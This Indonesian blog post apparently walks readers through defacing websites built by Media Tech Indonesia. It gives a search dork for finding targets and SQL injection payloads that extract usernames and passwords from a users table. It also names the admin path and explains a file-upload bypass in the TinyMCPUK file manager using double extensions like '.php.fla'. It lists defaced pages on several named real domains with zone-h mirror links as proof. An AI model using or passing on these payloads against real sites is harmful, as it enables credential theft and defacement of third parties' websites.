a-ads

Sabtu, 16 Desember 2017

Unknown

All rights reserved. © 2015 Media Tech Indonesia vuln SQL Lokomedia and Tinympuck File Upload



Dork : intext:"All rights reserved. © 2015 Media Tech Indonesia"
kembangin lgi yg kampang

mungkin bisa langsung reverse ip nih web mediatechindonesia.com
reverse ip nya di https://www.yougetsignal.com/tools/web-sites-on-web-server/
klik satu satu web yg di reverse ip

buat exploit nya

Demo
SQL Lokomedia :
http://mediatechindonesia.com/statis-1-buat-web-surabaya.html

exploitnya bisa pakek :
'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+
or
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

admin loginya di :
/adminweb/
mediatechindonesia.com/adminweb

Demo
Tinympuck File Upload:
http://mediatechindonesia.com/tinymcpuk//filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

exploitnya :
/tinymcpuk//filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

bypas nya pakek ext php.fla or htm.fla

Hasil ku

http://www.hargatoyotasurabaya.info/tinymcpuk/gambar/Flash/hell.htm.fla
http://www.zone-h.org/mirror/id/30609038

http://daihatsusurabaya.info/tinymcpuk/gambar/Flash/hell.htm.fla
http://www.zone-h.org/mirror/id/30609039

http://mediatechindonesia.com/tinymcpuk/gambar/Flash/hell.htm.fla
http://www.zone-h.org/mirror/id/30609053

http://daihatsusurabaya.com/tinymcpuk/gambar/Flash/hell.htm.fla
http://www.zone-h.org/mirror/id/30609055


Unknown

About Unknown -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :